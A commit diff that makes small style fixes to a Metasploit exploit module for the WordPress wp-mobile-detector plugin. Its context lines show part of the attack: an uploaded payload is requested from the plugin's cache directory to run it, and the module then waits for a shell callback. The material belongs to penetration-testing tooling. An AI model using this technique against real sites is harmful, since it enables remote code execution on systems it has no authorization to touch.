wp-mobile-detector udpates

bug/bundler_fix
h00die 2017-10-27 10:10:04 -04:00
parent cfd7761818
commit 037c58d1f6
1 changed files with 3 additions and 3 deletions

View File

@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/' 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache') + '/'
) )
if res and !res.body.include?(payload_name) if res && !res.body.include?(payload_name)
vprint_status("#{payload_name} verified as not written.") vprint_status("#{payload_name} verified as not written.")
else else
fail_with(Failure::BadConfig,"#{payload_name} already written on system.") fail_with(Failure::BadConfig,"#{payload_name} already written on system.")
@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_good('Sleeping 5 seconds for payload upload') print_good('Sleeping 5 seconds for payload upload')
register_files_for_cleanup(payload_name) register_files_for_cleanup(payload_name)
select(nil,nil,nil,5) Rex.sleep(5)
print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}") print_status("Executing the payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name)}")
send_request_cgi( send_request_cgi(
@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name), 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'cache', payload_name),
}) })
# wait for callback, without this we exit too fast and miss our shell # wait for callback, without this we exit too fast and miss our shell
select(nil,nil,nil,2) Rex.sleep(2)
handler handler
else else
if res.nil? if res.nil?